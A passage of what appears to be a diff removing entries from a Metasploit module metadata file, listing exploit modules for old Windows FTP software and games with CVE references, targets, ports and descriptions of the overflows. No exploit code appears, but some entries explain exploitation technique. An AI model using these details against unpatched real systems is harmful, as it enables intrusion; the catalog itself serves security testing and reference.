"This module exploits a buffer overflow in the ProFTP 2.9\n client that is triggered through an excessively long welcome message.", - "references": [ - "CVE-2009-3976", - "OSVDB-57394", - "URL-http://www.labtam-inc.com/index.php?act=products&pid=1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/proftp_banner.rb", - "is_install_path": true, - "ref_name": "windows/ftp/proftp_banner", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/quickshare_traversal_write": { - "name": "QuickShare File Server 1.2.1 Directory Traversal Vulnerability", - "fullname": "exploit/windows/ftp/quickshare_traversal_write", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-02-03", - "type": "exploit", - "author": [ - "modpr0be", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in QuickShare File Server's FTP\n service. By supplying \"../\" in the file path, it is possible to trigger a\n directory traversal flaw, allowing the attacker to read a file outside the\n virtual directory. By default, the \"Writable\" option is enabled during account\n creation, therefore this makes it possible to create a file at an arbitrary\n location, which leads to remote code execution.", - "references": [ - "OSVDB-70776", - "EDB-16105", - "URL-http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html", - "URL-http://www.digital-echidna.org/2011/02/quickshare-file-share-1-2-1-directory-traversal-vulnerability/" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "QuickShare File Server 1.2.1" - ], - "mod_time": "2021-02-18 09:18:19 +0000", - "path": "/modules/exploits/windows/ftp/quickshare_traversal_write.rb", - "is_install_path": true, - "ref_name": "windows/ftp/quickshare_traversal_write", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ricoh_dl_bof": { - "name": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", - "fullname": "exploit/windows/ftp/ricoh_dl_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-01", - "type": "exploit", - "author": [ - "Julien Ahrens", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\n service. By supplying a long string of data to the USER command, it is\n possible to trigger a stack-based buffer overflow, which allows remote code\n execution under the context of the user.\n\n Please note that in order to trigger the vulnerability, the server must\n be configured with a log file name (by default, it's disabled).", - "references": [ - "CVE-2012-5002", - "OSVDB-79691", - "URL-http://web.archive.org/web/20120514112629/http://secunia.com/advisories/47912/", - "URL-http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/ftp/ricoh_dl_bof.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ricoh_dl_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/sami_ftpd_list": { - "name": "Sami FTP Server LIST Command Buffer Overflow", - "fullname": "exploit/windows/ftp/sami_ftpd_list", - "aliases": [], - "rank": 100, - "disclosure_date": "2013-02-27", - "type": "exploit", - "author": [ - "superkojiman", - "Doug Prostko " - ], - "description": "This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.\n The vulnerability exists in the processing of LIST commands. In order to trigger\n the vulnerability, the \"Log\" tab must be viewed in the Sami FTP Server managing\n application, in the target machine. On the other hand, the source IP address used\n to connect with the FTP Server is needed. If the user can't provide it, the module\n will try to resolve it. This module has been tested successfully on Sami FTP Server\n 2.0.1 over Windows XP SP3.", - "references": [ - "OSVDB-90815", - "BID-58247", - "EDB-24557" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Sami FTP Server 2.0.1 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/sami_ftpd_list.rb", - "is_install_path": true, - "ref_name": "windows/ftp/sami_ftpd_list", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/sami_ftpd_user": { - "name": "KarjaSoft Sami FTP Server v2.0.2 USER Overflow", - "fullname": "exploit/windows/ftp/sami_ftpd_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-01-24", - "type": "exploit", - "author": [ - "Muhammad Ahmed Siddiqui", - "Critical Security", - "n30m1nd", - "aushack ", - "bcoles " - ], - "description": "This module exploits an unauthenticated stack buffer overflow in\n KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long\n USER string during login.\n\n The payload is triggered when the administrator opens the application\n GUI. If the GUI window is open at the time of exploitation, the\n payload will be executed immediately. Keep this in mind when selecting\n payloads. The application will crash following execution of the\n payload and will not restart automatically.\n\n When the application is restarted, it will re-execute the payload\n unless the payload has been manually removed from the SamiFTP.binlog\n log file.\n\n This module has been tested successfully on Sami FTP Server versions:\n 2.0.2 on Windows XP SP0 (x86);\n 2.0.2 on Windows 7 SP1 (x86);\n 2.0.2 on Windows 7 SP1 (x64); and\n 2.0.2 on Windows 10 (1909) (x64).", - "references": [ - "CVE-2006-0441", - "CVE-2006-2212", - "OSVDB-25670", - "BID-16370", - "BID-22045", - "BID-17835", - "EDB-1448", - "EDB-1452", - "EDB-1462", - "EDB-3127", - "EDB-3140", - "EDB-40675" - ], - "platform": "Windows", - "arch": "x86", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Sami FTP Server version 2.0.2" - ], - "mod_time": "2021-02-25 20:53:30 +0000", - "path": "/modules/exploits/windows/ftp/sami_ftpd_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/sami_ftpd_user", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/sasser_ftpd_port": { - "name": "Sasser Worm avserve FTP PORT Buffer Overflow", - "fullname": "exploit/windows/ftp/sasser_ftpd_port", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-05-10", - "type": "exploit", - "author": [ - "valsmith ", - "chamuco ", - "aushack " - ], - "description": "This module exploits the FTP server component of the Sasser worm.\n By sending an overly long PORT command the stack can be overwritten.", - "references": [ - "OSVDB-6197" - ], - "platform": "Windows", - "arch": "x86", - "rport": 5554, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows XP SP0", - "Windows XP SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/sasser_ftpd_port.rb", - "is_install_path": true, - "ref_name": "windows/ftp/sasser_ftpd_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/scriptftp_list": { - "name": "ScriptFTP LIST Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/scriptftp_list", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-10-12", - "type": "exploit", - "author": [ - "modpr0be", - "TecR0c ", - "mr_me " - ], - "description": "AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow\n vulnerability that is triggered when processing a sufficiently long\n filename during a FTP LIST command resulting in overwriting the\n exception handler. Social engineering of executing a specially crafted\n ftp file by double click will result in connecting to our malicious\n server and perform arbitrary code execution which allows the attacker to\n gain the same rights as the user running ScriptFTP. This vulnerability\n affects versions 3.3 and earlier.", - "references": [ - "CVE-2011-3976", - "OSVDB-75633", - "EDB-17876", - "US-CERT-VU-440219" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Windows Vista" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/scriptftp_list.rb", - "is_install_path": true, - "ref_name": "windows/ftp/scriptftp_list", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/seagull_list_reply": { - "name": "Seagull FTP v3.3 Build 409 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/seagull_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "corelanc0d3r " - ], - "description": "This module exploits a buffer overflow in the Seagull FTP client that gets\n triggered when the ftp client processes a response to a LIST command. If the\n response contains an overly long file/folder name, a buffer overflow occurs,\n overwriting a structured exception handler.", - "references": [ - "OSVDB-94556", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/seagull_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/seagull_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/servu_chmod": { - "name": "Serv-U FTP Server Buffer Overflow", - "fullname": "exploit/windows/ftp/servu_chmod", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-12-31", - "type": "exploit", - "author": [ - "theLightCosine " - ], - "description": "This module exploits a stack buffer overflow in the site chmod command\n in versions of Serv-U FTP Server prior to 4.2.\n\n You must have valid credentials to trigger this vulnerability. Exploitation\n also leaves the service in a non-functional state.", - "references": [ - "CVE-2004-2111", - "OSVDB-3713", - "BID-9483" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 SP0-4 EN", - "Windows XP SP0-1 EN" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/servu_chmod.rb", - "is_install_path": true, - "ref_name": "windows/ftp/servu_chmod", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/servu_mdtm": { - "name": "Serv-U FTPD MDTM Overflow", - "fullname": "exploit/windows/ftp/servu_mdtm", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-02-26", - "type": "exploit", - "author": [ - "spoonm " - ], - "description": "This is an exploit for the Serv-U\\'s MDTM command timezone\n overflow. It has been heavily tested against versions\n 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against\n nt4/2k/xp/2k3. I have also had success against version 3,\n but only tested 1 version/os. The bug is in all versions\n prior to 5.0.0.4, but this exploit will not work against\n versions not listed above. You only get one shot, but it\n should be OS/SP independent.\n\n This exploit is a single hit, the service dies after the\n shellcode finishes execution.", - "references": [ - "CVE-2004-0330", - "OSVDB-4073", - "URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html", - "BID-9751" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Serv-U Uber-Leet Universal ServUDaemon.exe", - "Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe", - "Serv-U 5.0.0.0 ServUDaemon.exe" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/ftp/servu_mdtm.rb", - "is_install_path": true, - "ref_name": "windows/ftp/servu_mdtm", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/slimftpd_list_concat": { - "name": "SlimFTPd LIST Concatenation Overflow", - "fullname": "exploit/windows/ftp/slimftpd_list_concat", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-07-21", - "type": "exploit", - "author": [ - "Fairuzan Roslan " - ], - "description": "This module exploits a stack buffer overflow in the SlimFTPd\n server. The flaw is triggered when a LIST command is\n received with an overly-long argument. This vulnerability\n affects all versions of SlimFTPd prior to 3.16 and was\n discovered by Raphael Rigo.", - "references": [ - "CVE-2005-2373", - "OSVDB-18172", - "BID-14339" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "SlimFTPd Server <= 3.16 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/slimftpd_list_concat.rb", - "is_install_path": true, - "ref_name": "windows/ftp/slimftpd_list_concat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/trellian_client_pasv": { - "name": "Trellian FTP Client 3.01 PASV Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/trellian_client_pasv", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-04-11", - "type": "exploit", - "author": [ - "zombiefx", - "dookie" - ], - "description": "This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered\n through an excessively long PASV message.", - "references": [ - "CVE-2010-1465", - "OSVDB-63812", - "EDB-12152" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/trellian_client_pasv.rb", - "is_install_path": true, - "ref_name": "windows/ftp/trellian_client_pasv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/turboftp_port": { - "name": "Turbo FTP Server 1.30.823 PORT Overflow", - "fullname": "exploit/windows/ftp/turboftp_port", - "aliases": [], - "rank": 500, - "disclosure_date": "2012-10-03", - "type": "exploit", - "author": [ - "Zhao Liang", - "Lincoln", - "corelanc0d3r", - "thelightcosine" - ], - "description": "This module exploits a buffer overflow vulnerability found in the PORT\n command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote\n code execution under the context of SYSTEM.", - "references": [ - "EDB-22161", - "OSVDB-85887" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows Universal TurboFtp 1.30.823", - "Windows Universal TurboFtp 1.30.826" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/turboftp_port.rb", - "is_install_path": true, - "ref_name": "windows/ftp/turboftp_port", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/vermillion_ftpd_port": { - "name": "Vermillion FTP Daemon PORT Command Memory Corruption", - "fullname": "exploit/windows/ftp/vermillion_ftpd_port", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-09-23", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits an out-of-bounds array access in the Arcane Software\n Vermillion FTP server. By sending a specially crafted FTP PORT command,\n an attacker can corrupt stack memory and execute arbitrary code.\n\n This particular issue is caused by processing data bound by attacker\n controlled input while writing into a 4 byte stack buffer. Unfortunately,\n the writing that occurs is not a simple byte copy.\n\n Processing is done using a source ptr (p) and a destination pointer (q).\n The vulnerable function walks the input string and continues while the\n source byte is non-null. If a comma is encountered, the function increments\n the destination pointer. If an ascii digit [0-9] is encountered, the\n following occurs:\n\n *q = (*q * 10) + (*p - '0');\n\n All other input characters are ignored in this loop.\n\n As a consequence, an attacker must craft input such that modifications\n to the current values on the stack result in usable values. In this exploit,\n the low two bytes of the return address are adjusted to point at the\n location of a 'call edi' instruction within the binary. This was chosen\n since 'edi' points at the source buffer when the function returns.\n\n NOTE: This server can be installed as a service using \"vftpd.exe install\".\n If so, the service does not restart automatically, giving an attacker only\n one attempt.", - "references": [ - "OSVDB-62163", - "EDB-11293" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic Targeting", - "vftpd 1.31 - Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/vermillion_ftpd_port.rb", - "is_install_path": true, - "ref_name": "windows/ftp/vermillion_ftpd_port", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/warftpd_165_pass": { - "name": "War-FTPD 1.65 Password Overflow", - "fullname": "exploit/windows/ftp/warftpd_165_pass", - "aliases": [], - "rank": 200, - "disclosure_date": "1998-03-19", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits the buffer overflow found in the PASS command\n in War-FTPD 1.65. This particular module will only work\n reliably against Windows 2000 targets. The server must be\n configured to allow anonymous logins for this exploit to\n succeed. A failed attempt will bring down the service\n completely.", - "references": [ - "CVE-1999-0256", - "OSVDB-875", - "BID-10078" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/warftpd_165_pass.rb", - "is_install_path": true, - "ref_name": "windows/ftp/warftpd_165_pass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/warftpd_165_user": { - "name": "War-FTPD 1.65 Username Overflow", - "fullname": "exploit/windows/ftp/warftpd_165_user", - "aliases": [], - "rank": 200, - "disclosure_date": "1998-03-19", - "type": "exploit", - "author": [ - "Fairuzan Roslan " - ], - "description": "This module exploits a buffer overflow found in the USER command\n of War-FTPD 1.65.", - "references": [ - "CVE-1999-0256", - "OSVDB-875", - "BID-10078" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows 2000 SP0-SP4 English", - "Windows XP SP0-SP1 English", - "Windows XP SP2 English", - "Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/warftpd_165_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/warftpd_165_user", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/wftpd_size": { - "name": "Texas Imperial Software WFTPD 3.23 SIZE Overflow", - "fullname": "exploit/windows/ftp/wftpd_size", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-08-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in the SIZE verb in\n Texas Imperial's Software WFTPD 3.23.", - "references": [ - "CVE-2006-4318", - "OSVDB-28134", - "BID-19617" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP1 English", - "Windows XP Pro SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/wftpd_size.rb", - "is_install_path": true, - "ref_name": "windows/ftp/wftpd_size", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/winaxe_server_ready": { - "name": "WinaXe 7.7 FTP Client Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/winaxe_server_ready", - "aliases": [], - "rank": 400, - "disclosure_date": "2016-11-03", - "type": "exploit", - "author": [ - "Chris Higgins", - "hyp3rlix" - ], - "description": "This module exploits a buffer overflow in the WinaXe 7.7 FTP client.\n This issue is triggered when a client connects to the server and is\n expecting the Server Ready response.", - "references": [ - "EDB-40693", - "URL-http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/winaxe_server_ready.rb", - "is_install_path": true, - "ref_name": "windows/ftp/winaxe_server_ready", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/wing_ftp_admin_exec": { - "name": "Wing FTP Server Authenticated Command Execution", - "fullname": "exploit/windows/ftp/wing_ftp_admin_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-06-19", - "type": "exploit", - "author": [ - "Nicholas Nam ", - "Imran E. Dawoodjee " - ], - "description": "This module exploits the embedded Lua interpreter in the admin web interface for\n versions 3.0.0 and above. When supplying a specially crafted HTTP POST request\n an attacker can use os.execute() to execute arbitrary system commands on\n the target with SYSTEM privileges.", - "references": [ - "URL-http://www.wftpserver.com", - "URL-https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm" - ], - "platform": "Windows", - "arch": "x86", - "rport": 5466, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Wing FTP Server >= 3.0.0" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb", - "is_install_path": true, - "ref_name": "windows/ftp/wing_ftp_admin_exec", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/wsftp_server_503_mkd": { - "name": "WS-FTP Server 5.03 MKD Overflow", - "fullname": "exploit/windows/ftp/wsftp_server_503_mkd", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-11-29", - "type": "exploit", - "author": [ - "et ", - "Reed Arvin " - ], - "description": "This module exploits the buffer overflow found in the MKD\n command in IPSWITCH WS_FTP Server 5.03 discovered by Reed\n Arvin.", - "references": [ - "CVE-2004-1135", - "OSVDB-12509", - "BID-11772" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "WS-FTP Server 5.03 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb", - "is_install_path": true, - "ref_name": "windows/ftp/wsftp_server_503_mkd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/wsftp_server_505_xmd5": { - "name": "Ipswitch WS_FTP Server 5.05 XMD5 Overflow", - "fullname": "exploit/windows/ftp/wsftp_server_505_xmd5", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-09-14", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in the XMD5 verb in\n IPSWITCH WS_FTP Server 5.05.", - "references": [ - "CVE-2006-4847", - "OSVDB-28939", - "BID-20076" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb", - "is_install_path": true, - "ref_name": "windows/ftp/wsftp_server_505_xmd5", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/xftp_client_pwd": { - "name": "Xftp FTP Client 3.0 PWD Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/xftp_client_pwd", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-04-22", - "type": "exploit", - "author": [ - "zombiefx", - "dookie" - ], - "description": "This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered\n through an excessively long PWD message.", - "references": [ - "OSVDB-63968", - "EDB-12332" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/xftp_client_pwd.rb", - "is_install_path": true, - "ref_name": "windows/ftp/xftp_client_pwd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/xlink_client": { - "name": "Xlink FTP Client Buffer Overflow", - "fullname": "exploit/windows/ftp/xlink_client", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-10-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Xlink FTP Client 32\n Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2.\n When an overly long FTP server response is received by a client,\n arbitrary code may be executed.", - "references": [ - "CVE-2006-5792", - "OSVDB-33969", - "URL-http://www.xlink.com" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Pro SP3 English", - "Windows 2000 SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/xlink_client.rb", - "is_install_path": true, - "ref_name": "windows/ftp/xlink_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/xlink_server": { - "name": "Xlink FTP Server Buffer Overflow", - "fullname": "exploit/windows/ftp/xlink_server", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-10-03", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Xlink FTP Server\n that comes bundled with Omni-NFS Enterprise 5.2.\n When a overly long FTP request is sent to the server,\n arbitrary code may be executed.", - "references": [ - "CVE-2006-5792", - "OSVDB-58646", - "URL-http://www.xlink.com" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Omni-NFS Enterprise V5.2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/xlink_server.rb", - "is_install_path": true, - "ref_name": "windows/ftp/xlink_server", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/games/mohaa_getinfo": { - "name": "Medal of Honor Allied Assault getinfo Stack Buffer Overflow", - "fullname": "exploit/windows/games/mohaa_getinfo", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-07-17", - "type": "exploit", - "author": [ - "Jacopo Cervini" - ], - "description": "This module exploits a stack based buffer overflow in the getinfo\n command of Medal Of Honor Allied Assault.", - "references": [ - "CVE-2004-0735", - "OSVDB-8061", - "EDB-357", - "BID-10743" - ], - "platform": "Windows", - "arch": "", - "rport": 12203, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Medal Of Honor Allied Assault v 1.0 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/games/mohaa_getinfo.rb", - "is_install_path": true, - "ref_name": "windows/games/mohaa_getinfo", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/games/racer_503beta5": { - "name": "Racer v0.5.3 Beta 5 Buffer Overflow", - "fullname": "exploit/windows/games/racer_503beta5", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-08-10", - "type": "exploit", - "author": [ - "Trancek " - ], - "description": "This module exploits the Racer Car and Racing Simulator game\n versions v0.5.3 beta 5 and earlier. Both the client and server listen\n on UDP port 26000. By sending an overly long buffer we are able to\n execute arbitrary code remotely.", - "references": [ - "CVE-2007-4370", - "OSVDB-39601", - "EDB-4283", - "BID-25297" - ], - "platform": "Windows", - "arch": "", - "rport": 26000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Fmodex.dll - Universal", - "Win XP SP2 English", - "Win XP SP2 Spanish" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/games/racer_503beta5.rb", - "is_install_path": true, - "ref_name": "windows/games/racer_503beta5", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/games/ut2004_secure": { - "name": "Unreal Tournament 2004 \"secure\" Overflow (Win32)", - "fullname": "exploit/windows/games/ut2004_secure", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-06-18", - "type": "exploit", - "author": [ - "stinko " - ], - "description": "This is an exploit for the GameSpy secure query in\n the Unreal Engine.\n\n This exploit only requires one UDP packet, which can\n be both spoofed and sent to a broadcast address.\n Usually, the GameSpy query server listens on port 7787,\n but you can manually specify the port as well.\n\n The RunServer.sh script will automatically restart the\n server upon a crash, giving us the ability to\n bruteforce the service and exploit it multiple\n times.", - "references": [ - "CVE-2004-0608", - "OSVDB-7217", - "BID-10570" - ], - "platform": "Windows", - "arch": "", - "rport": 7787, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "UT2004 Build 3186" - ], - "mod_time": "2020-10-02 